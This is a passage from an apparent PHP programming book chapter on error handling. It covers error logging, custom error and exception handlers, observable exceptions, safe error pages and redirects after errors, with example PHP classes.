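One way to follow this advice is to switch display_errors at runtime according to the deployment environment. This is a sketch under stated assumptions: the `configure_error_display` function and the `APP_ENV` environment variable are hypothetical names chosen for the example; only ini_set, ini_get, and getenv are real PHP functions.

```php
<?php
// Hypothetical helper: turn inline error display on only in development.
function configure_error_display($environment)
{
    if ($environment === 'development') {
        ini_set('display_errors', '1');
    } else {
        ini_set('display_errors', '0');
    }
    // Return the effective setting so callers can confirm it.
    return ini_get('display_errors');
}

// Assumption: APP_ENV is a made-up variable; fall back to the safe default.
$environment = getenv('APP_ENV');
configure_error_display($environment === false ? 'production' : $environment);
```

Defaulting to the production behavior means a missing or misspelled environment name never exposes error details to users.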
The log_errors and error_log Directives

If log_errors is set, errors will be logged to the location specified in the error_log directive. This setting is useful for maintaining a running log of the errors encountered in your application or site, and is helpful because it acts as a reference for all the errors that may arise when the display_errors directive is disabled.

You will likely want to set ignore_repeated_errors and ignore_repeated_source to prevent those logs from filling up when the same error occurs repeatedly.

How can I trigger PHP errors?

The capability to trigger errors is not restricted to the PHP interpreter. At times, you may find it useful to generate PHP errors yourself: they can be used as a debugging aid, to generate deprecation notices in code you’re releasing to others, and more. So, how do you trigger PHP errors?

Solution

You can trigger errors within your code using PHP’s trigger_error function. This function has the following prototype:

trigger_error($error_message, $error_type = E_USER_NOTICE);

The $error_type argument must be one of the user error constants E_USER_NOTICE, E_USER_WARNING, or E_USER_ERROR, which, as noted in the code above, defaults to E_USER_NOTICE.

Discussion

When they first discover trigger_error, PHP developers have a tendency to use it for any error conditions they observe in their code. However, better strategies exist.

Trigger E_USER_NOTICEs primarily in development when debugging your code. Notices can be helpful for indicating the values that have been set, when certain pieces of code are executing, and so on. (Note, however, that this isn’t the most efficient way to debug.)
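The deprecation-notice use mentioned earlier might look something like the sketch below. Both function names are hypothetical and exist only for this illustration; the pattern is simply a call to trigger_error with E_USER_NOTICE before delegating to the replacement.

```php
<?php
// Hypothetical replacement function in a library released to others.
function new_total(array $prices)
{
    return array_sum($prices);
}

// Hypothetical legacy function, kept only for backward compatibility.
function old_total(array $prices)
{
    // Raise a notice so callers learn about the replacement.
    trigger_error('old_total() is deprecated; use new_total() instead', E_USER_NOTICE);
    return new_total($prices);
}

// The call still works; the notice is reported according to your settings.
echo old_total(array(1, 2, 3)), "\n";
```

Since PHP 5.3 there is also a dedicated E_USER_DEPRECATED level that can be passed to trigger_error for this purpose.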
Trigger E_USER_WARNINGs when your code detects exceptional situations from which it can recover gracefully. For example, such a situation might arise if a web service cannot be contacted, but your code is still able to generate an error message; in this case, the warning might serve to indicate to you later to check your application’s connectivity with the web services server.

Trigger E_USER_ERRORs when your code hits a problem from which it cannot recover. Examples of this kind of problem include a situation in which the executing script is unable to connect to your database, or you discover that your web site template directory is unreadable.

How do I implement a custom error handler with PHP?

The php.ini settings for handling errors are fairly limited. They really only cover the tasks of displaying and logging errors, and you can’t even specify the format in which those errors are logged or displayed! What if you want to do something other than these tasks?

Solution

PHP allows developers to define custom error handlers. Such error handlers may constitute any valid PHP callback: a function, a static class method, or a dynamic class method. Whatever callback you decide to use, it must follow the error handler prototype:

function handler($errno, $errmsg[, $filename[, $linenum[, $vars]]])

When your custom error-handling function is called, the first parameter, $errno, will contain the level of the error as an integer; the second parameter, $errmsg, will contain the description of the error. $filename contains the name of the file containing the code that raised the error, $linenum contains the line number where the error was raised, and $vars contains an array of all variables that existed in the scope in which the error was triggered. (PHP 7.2 deprecated this fifth argument and PHP 8.0 no longer passes it, so give it a default value if your code must run on those versions.) You can choose to perform any task you like within your error handler: log errors, mail the error details to system administrators or developers, print the error details, and so on.
However, you should understand that if you do not explicitly exit script execution in your error handler, program execution will continue from the location at which the error was triggered originally. Your code will have no idea what tasks were undertaken in the error handler, though.

Use the set_error_handler function to tell PHP to use your error handler:

set_error_handler($error_handler[, $error_types])

The first parameter is a callback that references your error handler. The optional second parameter is used to tell PHP which error types should be handled by your custom function. By default, if no error type is provided, all errors will be handled except for E_ERROR, E_PARSE, E_CORE_ERROR, E_CORE_WARNING, E_COMPILE_ERROR, E_COMPILE_WARNING, and E_STRICT.

Since you can specify the types, you can specify multiple error handlers, one for each type you wish to handle. An easier solution, however, is to use a single error handler for all error types you wish to handle, and in it employ a switch statement that uses the value of the first argument to the handler function, $errno, to select alternative actions that respond to specific error types. $errno is the error level of the triggered error, the integer value represented by the error type constants listed in “What error levels does PHP report?”. Then, the error handler needs to return true if the error was handled, or false if not; returning false tells PHP to pass on error-handling control to the default error handler.

As an example, here’s a PHP 5 class that implements a custom error handler which selects alternative actions appropriate to the level of the error raised:

ErrorHandler.class.php (excerpt)

<?php
class ErrorHandler
{
  protected $_noticeLog = '/tmp/notice.log';
  public $message = '';
  public $filename = '';
  public $line = 0;
  public $vars = array();

  public function __construct($message, $filename, $linenum, $vars)
  {
    $this->message = $message;
    $this->filename = $filename;
    // Store the line number in $line, the property the handler methods read.
    $this->line = $linenum;
    $this->vars = $vars;
  }

The constructor accepts the various error attributes as arguments and stores them in the object’s properties. The $_noticeLog variable stores the location of the log file for E_USER_NOTICE level error messages. If you’re testing on a Windows machine you should change this value to something like C:\notice.log, or an appropriate location on your system.

Here’s the custom error-handling method of our class:

ErrorHandler.class.php (excerpt)

  // $vars defaults to an empty array because PHP 8 no longer passes it.
  public static function handle($errno, $errmsg, $filename, $line, $vars = array())
  {
    $self = new self($errmsg, $filename, $line, $vars);
    switch ($errno) {
      case E_USER_ERROR:
        return $self->handleError();
      case E_USER_WARNING:
      case E_WARNING:
        return $self->handleWarning();
      case E_USER_NOTICE:
      case E_NOTICE:
        return $self->handleNotice();
      default:
        return false;
    }
  }

The handle method above instantiates an ErrorHandler object with the error message, filename, line number, and variable context, and then calls the appropriate handler method based on $errno. If the error level does not match the levels handled by this class, it reverts the error flow to the default error handler by returning false.
Now we can build the methods that handle the different types of errors. First up is the handleError method:

ErrorHandler.class.php (excerpt)

  public function handleError()
  {
    // Capture the backtrace in a buffer without sending it to the browser.
    ob_start();
    debug_print_backtrace();
    $backtrace = ob_get_clean();
    $body =<<<EOT
A fatal error occurred in the application:

Message: {$this->message}
File: {$this->filename}
Line: {$this->line}
Backtrace:
{$backtrace}
EOT;
    error_log($body, 1, 'sysadmin@example.com', "Subject: Fatal error occurred\n");
    exit(1);
  }

handleError is used to handle E_USER_ERROR level errors. When it’s called, this method sends an email to the system administrator and halts execution. It uses a little-known feature of PHP’s error_log function to send the email: if you specify 1 for the second argument and an email address as the third argument, it employs the php.ini settings for sendmail to send an email. Finally, handleError halts execution of the script using exit. [3]

[3] Calling exit with an integer exit status parameter of anything other than 0 indicates a script failure.

Our next method is handleWarning:

ErrorHandler.class.php (excerpt)

  public function handleWarning()
  {
    $body =<<<EOT
An environmental error occurred in the application, and may indicate a
potential larger issue:

Message: {$this->message}
File: {$this->filename}
Line: {$this->line}
EOT;
    return error_log($body, 1, 'sysadmin@example.com', "Subject: Non-fatal error occurred\n");
  }

handleWarning is used to handle E_USER_WARNING and E_WARNING errors. Like handleError above, it sends an email to the system administrator; however, instead of halting execution, it simply returns the result of the error_log function: true if the function succeeds, false if it fails.

Finally, the handleNotice method:

ErrorHandler.class.php (excerpt)

  public function handleNotice()
  {
    $body =<<<EOT
A NOTICE was raised with the following information:

Message: {$this->message}
File: {$this->filename}
Line: {$this->line}
EOT;
    $body = date('[Y-m-d H:i:s] ') . $body . "\n";
    return error_log($body, 3, $this->_noticeLog);
  }
}

handleNotice handles E_USER_NOTICE and E_NOTICE level errors. Since notices do not represent dangerous errors, we assume that the system administrator doesn’t need to know about them immediately, and log them to a file instead of sending an email.

Finally, we tell PHP that we want ErrorHandler::handle to act as our error handler, by using the aptly named set_error_handler function:

ErrorHandler.class.php (excerpt)

set_error_handler(array('ErrorHandler', 'handle'));
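The same switch-and-return contract can be seen in a much smaller, function-based handler. This is only an illustrative sketch, not a replacement for the class above: `sketch_handler` and the `seenNotices` global are hypothetical names, and the handler leaves out the $vars argument, which PHP 8 no longer passes.

```php
<?php
// Hypothetical in-memory store for the notices the handler deals with.
$GLOBALS['seenNotices'] = array();

// Hypothetical handler: records notices, defers everything else to PHP.
function sketch_handler($errno, $errmsg, $filename = '', $linenum = 0)
{
    switch ($errno) {
        case E_USER_NOTICE:
        case E_NOTICE:
            $GLOBALS['seenNotices'][] = "$errmsg ($filename:$linenum)";
            return true;  // handled; execution resumes after the trigger point
        default:
            return false; // not handled; PHP's default handler takes over
    }
}

set_error_handler('sketch_handler');

trigger_error('cache miss for key "user:42"', E_USER_NOTICE);
echo count($GLOBALS['seenNotices']), " notice(s) recorded\n";

// Put back whichever handler was active before.
restore_error_handler();
```

Calling restore_error_handler when you’re finished is useful in tests and libraries, where you don’t want to leave your handler installed for unrelated code.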
Discussion

PHP error handlers are trivial to implement, and, because you can write your own functionality, you can create whatever error handling strategies you desire. Be careful to test your code stringently, however, as you don’t want to find yourself in a circular error-handling situation, where your error handler starts emitting errors that it then needs to handle itself.

How do I log and report errors?

You need to create a robust web application, but even the best software engineers make mistakes. Perhaps you’re using third-party libraries that emit deprecation notices. Or maybe your code, though in its infancy, has been pushed into production due to time constraints. You need to keep track of the errors occurring on your site somehow. What tools does PHP offer for the job?

Solution

Logging errors is one thing; reporting them is a whole different ballgame.

Logging is usually best done via PHP’s own logging facilities. For example, you’ll recall that the error_log setting can be set in php.ini, or at runtime using the ini_set function.

PHP’s error_log function can be used both to log errors and to send emails. It can log errors to PHP’s error_log or an alternate log destination, or send an email to a specified address (it uses mail to do the actual sending). Also, if you’re using a debugger, it can send the information over the debugging connection.

While PHP’s logging functionality is nice, it still needs to be triggered within your code, typically via your custom error handler.

The simplest way to log errors is to set up logging via PHP’s configuration settings, like so:

// Report everything except notices: clear both notice bits from E_ALL.
error_reporting(E_ALL & ~(E_NOTICE | E_USER_NOTICE));
ini_set('error_log', '/tmp/php-error.log');
ini_set('ignore_repeated_errors', true);
ini_set('ignore_repeated_source', true);
ini_set('log_errors', true);
These settings will log all errors to /tmp/php-error.log except notices, repeated errors, and errors reported from the same source.

You can also set up a custom error handler to conduct logging or reporting. Typically, the safest and easiest way to do so is simply to use error_log, as we saw in the solution in “How do I implement a custom error handler with PHP?”.

If you intend to use email to report errors in your custom error handler, doing so via the error_log function or the standard PHP mail function may not be the best solution. A third-party library, for example PEAR::Mail, may be better suited to the task. In those cases, use the library within your custom error handler to send the email. [4]

[4] For more information about sending email with PHP, see Chapter 7.

Finally, keep in mind that log files and email are not the only ways to report errors. You could also tell PHP to send SMS text messages and pager messages to your sysadmins or developers.

How can I use PHP exceptions for error handling?

PHP errors are useful, but they pose many problems:

■ There’s no way to allow an error to bubble up the calling stack; errors must be handled immediately.
■ The only way to exit the function or method that’s executing when an error is triggered is to have the handler exit script execution.
■ It’s difficult to determine what the problem is without interrogating the error message, as any error you trigger yourself won’t have an associated error code or name.

PHP 5 marked the introduction of a new error-handling scheme: exceptions. As I mentioned at the start of this chapter, an exception is used to denote exceptional behavior on the part of the script, that is, situations in which something went wrong, or something unexpected occurred. Exceptions are thrown by your code, and bubble up through the code until they’re caught:
throw new Exception(
    "There's something rotten in the state of this code");

So, how can we use PHP exceptions to perform error handling?

Solution

Unlike PHP errors, exceptions can always be caught within your code, which allows you to handle them gracefully when you have the facilities to do so. When an exception is thrown, PHP will immediately look for a matching catch block and run the code within it. Thus, it’s important to wrap your code within a try {…} catch (Exception $e) {…} block at the point at which you wish to catch potential exceptions. If an exception is not caught, PHP will generate a fatal error (E_ERROR) with the message “Uncaught Exception.”

Now, within the catch block, you can deal with the exception in the way you feel is best. For example, imagine you’re generating a web page that includes data from a web service. You may throw an exception when the web service is unavailable, but catch it later and display a “Service unavailable” message within the web page you’re generating:

try {
  $data = $this->getDataFromService();
} catch (ServiceUnavailableException $e) {
  $data = 'Service unavailable';
}

In this example, the script doesn’t exit completely as a result of the error. Instead, the script finishes executing and the web page is generated successfully, so you’re able to deal with the error at the right time and take appropriate action.

If this sounds good, you’ll be pleased to hear that it gets even better: PHP 5 saw the introduction of object type hinting. This facility forces parameters of functions and methods to be objects of a particular class, or subclasses of that class. You can use type hinting when you’re catching exceptions in a catch (Exception $e) {…} block, and multiple catch blocks can be used to catch different classes of exceptions:
try {
  ⋮ try some code…
} catch (PDOException $e) {
  ⋮ handle PDO exceptions…
} catch (Zend_Exception $e) {
  ⋮ handle Zend Framework exceptions…
} catch (Exception $e) {
  ⋮ handle all other exceptions…
}

Discussion

One common mistake novices make is to use exceptions for every type of error situation. For instance, I’ve often seen constructs like this used to validate data:

public function isValidData($data)
{
  if (!is_array($data)) {
    throw new Exception('Invalid data');
  }
  // array_key_exists takes the key first, then the array to search.
  if (!array_key_exists('id', $data)) {
    throw new Exception('Id key missing');
  }
  ⋮ finish validating…
  return true;
}

What’s wrong with this code? Simply this: invalid data is just one of the possible results; it’s not an exceptional situation. In the case above, it’s best simply to return an error message or true. Then, you can always check for Boolean true or is_string on the return value:
public function isValidData($data)
{
  if (!is_array($data)) {
    return 'Invalid data';
  }
  // array_key_exists takes the key first, then the array to search.
  if (!array_key_exists('id', $data)) {
    return 'Id key missing';
  }
  ⋮ finish validating…
  return true;
}

Another common mistake that’s related to the one above is to use exceptions as part of the script’s program flow. Code that uses the original definition of isValidData above, which throws exceptions, might look like this:

try {
  $result = $this->isValidData($data);
} catch (Exception $e) {
  if ('Invalid data' == $e->getMessage()) {
    $error = $this->missingData();
  } elseif ('Id key missing' == $e->getMessage()) {
    $error = $this->missingId($data);
  } else {
    $error = 'Unknown error';
  }
}
if (isset($error)) {
  ⋮ handle error…
}

In this example, the code uses exceptions within the program flow to make decisions; it’s almost the equivalent of programming using GOTO statements. This is a fairly
confusing way to express decision-making branches in your code, particularly when other methods are much more suitable (including testing return values from the function/method call, performing the various error method calls within the called function/method, and so on).

Use exceptions when you can detect an event or condition in a unit of code that prevents any further execution. Good examples include:

■ database errors
■ web service call errors
■ filesystem errors (such as permissions, missing paths, and so on)
■ data encoding errors (until PHP 6 is out, that is)
■ parse errors (for example, when parsing configuration or template files)

When used wisely and sparingly, exceptions become a very powerful error-handling tool. For more information on PHP exceptions, read the relevant PHP manual page. [5]

[5] http://php.net/exceptions/

How do I create a custom Exception class?

The base Exception class provided in PHP 5 can be extended, but since exceptions bubble up the stack until they’re caught, why would you bother to create a custom Exception class? Well, if you use different Exception classes, it becomes much simpler to target specific types of exceptions and recover from them.

Other reasons why you’d create a custom Exception class include:

■ You want to log specific types of exceptions.
■ You need to mail exception messages of particular classes.
■ You want to create special __toString output for pretty printing exceptions, or use exceptions in other specialized circumstances (for example, an XML-RPC client or server might use an exception class for fault responses, with the __toString method creating the XML fault response).
Solution

Exception classes extend either the base PHP Exception class, or a class derived from it. To be able to catch your custom exception, all you need to do is extend it:

class My_Exception extends Exception {}

An exception that’s defined like this will act as would any other exception, though it can be type hinted as My_Exception when you’re catching exceptions:

try {
  ⋮ try some code…
} catch (My_Exception $e) {
  ⋮ handle exception…
}

The only overrideable methods in the Exception class are __construct and __toString. If you’re overriding the __construct method, your custom exception should call parent::__construct to ensure all data in the exception is properly set:

class My_Exception extends Exception
{
  public function __construct($message = null, $code = 0)
  {
    parent::__construct($message, $code);
    ⋮ do the rest of the initialization…
  }
}

Discussion

It’s useful to create exception classes to cover distinct groups of code that may span more than one class. For instance, if you were creating a suite of input filter classes, you may want to create a single exception class to cover them; however, if you’re creating an MVC (Model-View-Controller) suite, you may want a different type of exception class for each distinct area of the MVC pattern.
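To make the grouping idea concrete, here is a small sketch of one base exception covering a suite of filter code. All of the names (`Filter_Exception`, `Filter_Config_Exception`, `load_filter`) are hypothetical and invented for this illustration; the point is only that a catch block for the base class also catches every class derived from it.

```php
<?php
// Hypothetical base exception for a whole suite of input filter classes.
class Filter_Exception extends Exception {}

// Hypothetical, more specific exception within the same group.
class Filter_Config_Exception extends Filter_Exception {}

// Hypothetical loader: a misconfigured filter name prevents further work.
function load_filter($name)
{
    $known = array('trim', 'strtolower');
    if (!in_array($name, $known, true)) {
        throw new Filter_Config_Exception("Unknown filter: $name");
    }
    return $name;
}

try {
    load_filter('rot26');
} catch (Filter_Exception $e) {
    // The base class matches Filter_Config_Exception as well.
    echo get_class($e), ': ', $e->getMessage(), "\n";
}
```

Calling code that only cares that something in the filter suite failed can catch the base class, while code that can recover from one specific problem can catch the derived class first.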
Earlier, we mentioned logging and emailing exceptions. Unlike PHP errors, exceptions are not logged, unless they remain uncaught, in which case they are logged as fatal (E_ERROR) errors. Most of the time, you won’t want or need to log exceptions. However, some types of exceptions may indicate situations that need attention from a developer or sysadmin: for example, your script is unable to connect to a database (when PDO throws exceptions, not PHP errors, for instance), a web service is inaccessible, a file or directory is inaccessible (due to permissions, or the fact that it’s simply missing), and so on.

The easy way to handle these situations is to override the exception’s constructor to perform the notification task. Here’s a custom exception class called My_Exception that calls the error_log function from within the constructor method:

class My_Exception extends Exception
{
  public function __construct($message = null, $code = 0)
  {
    parent::__construct($message, $code);
    error_log($this->getTraceAsString(), 3, '/tmp/my_exception.log');
  }
}

While this is an easy method for performing special error-logging actions when exceptions occur, I find that making the exception observable offers even more flexibility. Consider this usage example:

Observable_Exception::attach(new Logging_Exception_Observer());
Observable_Exception::attach(new Emailing_Exception_Observer());
class Foo_Exception extends Observable_Exception {}
⋮ perform some work…
throw new Foo_Exception('error occurred');

In this example, I’ve created a base exception class that’s observable, and called it Observable_Exception. I’ve attached two observers to this class: one that logs, and one that sends email. These observers check the type of the exceptions they observe, and use that information to decide whether or not to act.
This strategy provides some flexibility in terms of the way exceptions are handled, without requiring the use of an explicit exception handler. In addition, you can attach an observer anywhere in your code, which means that you can decide how to handle any given exception dynamically.

The code that implements observable exceptions is as follows:

Exception_Observer.class.php (excerpt)

interface Exception_Observer
{
  public function update(Observable_Exception $e);
}

This code defines the interface for exception observers. We’ll implement the Exception_Observer interface in a custom class in just a minute.

Next, we create the Observable_Exception class by extending the Exception class. We add a static property, $_observers, to hold an array of Exception_Observer instances:

Observable_Exception.class.php (excerpt)

class Observable_Exception extends Exception
{
  public static $_observers = array();

Next, a static method is used to attach observers. Type hinting enforces that only classes of the Exception_Observer type are allowed as observers:

Observable_Exception.class.php (excerpt)

  public static function attach(Exception_Observer $observer)
  {
    self::$_observers[] = $observer;
  }

We override the constructor method so that when the exception is instantiated all observers are notified via a call to the notify method:
Observable_Exception.class.php (excerpt)

  public function __construct($message = null, $code = 0)
  {
    parent::__construct($message, $code);
    $this->notify();
  }

Finally, the notify method loops through the array of observers and calls their update methods, passing a self-reference to the Observable_Exception object, $this:

Observable_Exception.class.php (excerpt)

  public function notify()
  {
    foreach (self::$_observers as $observer) {
      $observer->update($this);
    }
  }
}

Here’s an example of an exception observer:

Logging_Exception_Observer.class.php (excerpt)

require 'Exception_Observer.class.php';
require 'Observable_Exception.class.php';

class Logging_Exception_Observer implements Exception_Observer
{
  protected $_filename = '/tmp/exception.log';

  public function __construct($filename = null)
  {
    if ((null !== $filename) && is_string($filename)) {
      $this->_filename = $filename;
    }
  }

  public function update(Observable_Exception $e)
  {
    error_log($e->getTraceAsString(), 3, $this->_filename);
  }
}

This particular implementation of Exception_Observer logs exception information to a file. If you’re testing this code, make sure you set the $_filename variable to an appropriate location and filename.

This strategy offers more flexibility than simply handling the logging or reporting in the constructor method of a custom exception class, or defining an exception handler function. Firstly, if you build a hierarchy of exception classes deriving from the Observable_Exception class, you can attach any number of observers to each type of observable exception, allowing for the customization of the exception environment at any time without necessitating that changes be made to the actual exception code. It also means that only the top-level exception class needs to contain any additional code; all classes that derive from that class can be empty stubs. Finally, each observer’s update method can check the exception’s type with PHP’s instanceof operator to decide whether or not any action needs to be taken.

How do I implement a custom exception handler with PHP?

A custom handler for PHP errors can be specified using the set_error_handler function. Exceptions bubble up until they’re caught, but what happens if they’re not caught? By default, any exception that isn’t caught raises a fatal (E_ERROR) error. A custom PHP error handler can’t intercept fatal errors, so is there another way to handle uncaught exceptions?

Solution

Like PHP errors, exceptions can be handled automatically using a custom exception handler that’s specified with the set_exception_handler function.

You’d typically implement an exception handler if you wanted your program to take a particular action for an uncaught exception: for example, you might want to redirect the user to an error page, or to log or email the exception so the developer can correct the issue.
The basic approach involves providing a callback to set_exception_handler:

null|string set_exception_handler(mixed callback)

Discussion

Since exception handlers handle any uncaught exception, not exceptions of specific types, they’re somewhat easier to implement than error handlers. In this example, we create a custom exception-handling class that logs uncaught exceptions to a file, and displays a simple error page:

ExceptionHandler.class.php (excerpt)

<?php
class ExceptionHandler
{
  protected $_exception;
  protected $_logFile = '/tmp/exception.log';

  public function __construct(Exception $e)
  {
    $this->_exception = $e;
  }

  public static function handle(Exception $e)
  {
    $self = new self($e);
    $self->log();
    echo $self;
  }

The entry point for this exception handler is the static handle method, which instantiates itself, logs the exception, then displays an error message by echoing itself (using the magic __toString method). If you’re testing this code, make sure you set the $_logFile variable to an appropriate location and filename.

This code uses PHP’s error_log function to log the exception backtrace to a file:
ExceptionHandler.class.php (excerpt)

  public function log()
  {
    error_log($this->_exception->getTraceAsString(), 3, $this->_logFile);
  }

The __toString implementation below creates a “pretty” error page that’s displayed when an exception is handled, preventing the display to users of any sensitive information contained in the exception backtrace:

ExceptionHandler.class.php (excerpt)

  public function __toString()
  {
    $message =<<<EOH
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  <head>
    <title>Error</title>
  </head>
  <body>
    <h1>An error occurred in this application</h1>
    <p>
      An error occurred in this application; please try again. If you
      continue to receive this message, please
      <a href="mailto:webmaster@example.com">contact the webmaster</a>.
    </p>
  </body>
</html>
EOH;
    return $message;
  }
}

Finally, we tell PHP we want to handle exceptions using ExceptionHandler::handle:

set_exception_handler(array('ExceptionHandler', 'handle'));
And we’re done!

How can I handle PHP errors as if they were exceptions?

Perhaps you prefer exceptions to PHP errors, and want to handle fatal or environmental PHP errors as if they were exceptions. No problem!

Solution

This task is relatively simple. We need to create a custom exception class and, to handle errors, we must add a public static method that throws an exception, that is to say, creates an instance of itself:

ErrorToException.class.php (excerpt)

class ErrorToException extends Exception
{
  public static function handle($errno, $errstr)
  {
    throw new self($errstr, $errno);
  }
}

This class does not need to extend Exception in particular, just an Exception-derived class. You could, for instance, extend the Observable_Exception from “How do I create a custom Exception class?”.

You won’t want to handle all PHP errors this way, though; E_NOTICEs and E_STRICTs don’t justify such handling. Fortunately, set_error_handler takes an error level as its second argument:

set_error_handler(
  array('ErrorToException', 'handle'),
  E_USER_ERROR | E_WARNING | E_USER_WARNING
);

The example code above dictates that only warnings and user errors will be thrown as exceptions.
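A variation on the same idea is to throw PHP’s built-in ErrorException class, which also records the severity, file, and line of the original error. The sketch below is an alternative to the custom class above rather than the approach described in this solution, and `throw_as_exception` is a hypothetical function name.

```php
<?php
// Hypothetical handler: rethrow selected PHP errors as ErrorException.
function throw_as_exception($errno, $errstr, $errfile = '', $errline = 0)
{
    // Arguments: message, code, severity, filename, line.
    throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
}

// Only warnings and user errors are converted, as in the solution above.
set_error_handler('throw_as_exception', E_USER_ERROR | E_WARNING | E_USER_WARNING);

try {
    trigger_error('web service unreachable', E_USER_WARNING);
    echo "not reached\n";
} catch (ErrorException $e) {
    echo 'Caught: ', $e->getMessage(), "\n";
}

// Put back whichever handler was active before.
restore_error_handler();
```

Inside the catch block, getSeverity returns the original error level, so code can still distinguish a warning from a user error after the conversion.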
Discussion

While handling PHP errors as exceptions could be achieved even more simply using a function, rather than a static method, the approach I’ve explained here has several advantages. First, it allows you to type hint for these particular exceptions. Second, the exception class above could extend another custom exception class that provides additional functionality, such as the ability to log or mail exception information.

How do I display errors and exceptions gracefully?

You’ve taken heed of the advice to turn off display_errors on your production servers so that you don’t accidentally expose sensitive system information to users (and potentially hackers). If you’re not going to display errors, you’ll need to display something else instead. But how can you make this happen?

Solution

The solution to this common problem is to build the functionality into your error or exception handler.

Displaying errors from an error or exception handler is a fairly trivial task, although you may need to take into consideration whether or not the error is fatal, and whether or not output buffering is being used.

Since exception handlers are only triggered in the event of an uncaught exception, you can assume a fatal error when working with an exception handler; an example of an exception handler was shown in “How do I implement a custom exception handler with PHP?”. When you’re handling errors, however, you’ll need to check the error level of each error; you may want to display errors at some error levels, and not others, for example. The error-level checking can be done by testing the error level in your error handler, or by passing a second argument to set_error_handler to define which error levels the error handler should accommodate.

As for output buffering, we simply need to check the return value of ob_get_level. If that function returns zero, no output buffering is currently activated and we may
proceed; otherwise, we need to clean out all output buffers, which we can achieve easily by calling ob_end_clean in a while loop:

    while (@ob_end_clean());

We need to use the error suppression operator, @, in this case, because the function raises an E_NOTICE when it runs out of buffers to clean.

Let’s put together all the pieces, trapping what we deem fatal errors and throwing them as exceptions, and then implementing an exception handler that displays an error page, taking into consideration any output buffering that may be in process:

safeErrorDisplay.php (excerpt)

    class ErrorToException extends Exception
    {
        public static function handle($errno, $errstr)
        {
            throw new self($errstr, $errno);
        }
    }

    set_error_handler(
        array('ErrorToException', 'handle'),
        E_USER_ERROR | E_WARNING | E_USER_WARNING
    );

The code above defines a class that can be used as a PHP error handler. It simply throws an instance of itself as an exception. Here, I’ve set it to handle error types of E_USER_ERROR, E_WARNING, and E_USER_WARNING, all of which are errors that can be caught, and are likely indications that something’s seriously askew in the script.

Next, let’s define our ExceptionHandler class:

safeErrorDisplay.php (excerpt)

    class ExceptionHandler
    {
        protected $_exception;
        protected $_logFile = '/tmp/exception.log';

        public function __construct(Exception $e)
        {
            $this->_exception = $e;
        }

        public static function handle(Exception $e)
        {
            $self = new self($e);
            $self->log();
            while (@ob_end_clean());
            ob_start();
            echo $self;
            ob_end_flush();
        }

So far, we’ve defined a class with a static handle method that accepts an exception as its sole argument. The method instantiates its own class, logs the exception, then generates an error message. Before generating the error message, it clears out all output buffers to ensure that the error message is the only output returned.

Let’s turn to the details of logging and output generation:

safeErrorDisplay.php (excerpt)

        public function log()
        {
            error_log($this->_exception->getTraceAsString(), 3, $this->_logFile);
        }

Logging is undertaken with PHP’s own error_log function. This approach is safe, it won’t generate errors itself, and it’s simple to use. If you’re testing this code, be sure to put the appropriate path and filename in the $_logFile property.

Next, we implement a __toString method:

safeErrorDisplay.php (excerpt)

        public function __toString()
        {
            $message =<<<EOH
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <title>Error</title>
    </head>
    <body>
    <h1>An error occurred in this application</h1>
    <p>
    An error occurred in this application; please try again. If you
    continue to receive this message, please
    <a href="mailto:webmaster@example.com"
    >contact the webmaster</a>.
    </p>
    </body>
    </html>
    EOH;
            return $message;
        }
    }

That code should look familiar, since it’s similar to the solution in “How do I implement a custom exception handler with PHP?”. Our ExceptionHandler class has a __toString method that uses a heredoc to generate XHTML output. The method could be modified to show details of the exception, such as the message or backtrace, but that practice is discouraged in the production environment.

Finally, of course, we define ExceptionHandler::handle() as the exception handler:

safeErrorDisplay.php (excerpt)

    set_exception_handler(array('ExceptionHandler', 'handle'));

Discussion

The solution I’ve presented here achieves two goals: it throws severe PHP errors as exceptions, and it uses an exception handler to log the issues and to generate and display a generic error page for the user. Utilizing this solution is a good practice for production systems, as it allows you to keep track of site errors while generating a safe display for the end user.
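If you would rather not rely on the @ operator, one possible variation on the buffer-clearing loop is to test ob_get_level explicitly. The helper name discardOutputBuffers below is made up for this sketch, and the two ob_start calls merely simulate a page that was partway through rendering when the error occurred.

```php
<?php
// Hypothetical helper: discard every active output buffer without using @.
function discardOutputBuffers()
{
    $discarded = 0;
    while (ob_get_level() > 0) {
        // Stop if a buffer refuses to be removed, to avoid looping forever.
        if (!ob_end_clean()) {
            break;
        }
        $discarded++;
    }
    return $discarded;
}

// Simulate a half-rendered page using two nested buffers.
ob_start();
echo 'partial page output';
ob_start();
echo 'more partial output';

$count = discardOutputBuffers();
echo "Discarded $count buffers\n";
```

The trade-off is a few more lines in exchange for code that says what it is checking, rather than hiding a notice.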
Unfortunately, this solution has one drawback: it doesn’t prevent users from refreshing the page and triggering the error condition again.

Quite often, if a serious error has occurred, you may not want to keep the page that handles the error display code in the same environment as the page on which the error was triggered. In fact, there may be reasons why displaying an error page under these circumstances might fail completely (including a lack of database connectivity, bad permissions on template files, and so on). Additionally, if the user clicks on the browser’s Refresh button to see if the error occurs again, they’ll likely just perpetuate the problem. Finally, building the display HTML into a class can have a number of downsides: for instance, being completely separate from the site template and style sheets, it may not match your site’s look and feel.

As such, you may want to consider redirecting users to an error page, instead of simply displaying an error page.

How do I redirect users to another page following an error condition?

So, you’ve got error and exception handlers in place, tried having them display error pages, and you’re now worried about what will happen when a user refreshes the page. As an example, imagine this scenario: a database connectivity issue causes your site’s homepage to display an error page, and now hundreds or thousands of incoming users are clicking their Refresh buttons. It may be time to redirect them to an error page instead.

Solution

For this method to work, you’ll need to ensure that output buffering is on, so that no headers are sent to the browser prior to the redirect header being sent. The following sample should serve as a guideline:

    class ExceptionRedirectHandler
    {
        protected $_exception;
        protected $_logFile = '/tmp/exception.log';
        public $redirect = 'http://www.example.com/error';

        public function __construct(Exception $e)
        {
            $this->_exception = $e;
        }
        public static function handle(Exception $e)
        {
            $self = new self($e);
            $self->log();
            while (@ob_end_clean());
            header('HTTP/1.1 307 Temporary Redirect');
            header("Cache-Control: no-cache, must-revalidate");
            header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
            header('Location: ' . $self->redirect);
            exit(1);
        }

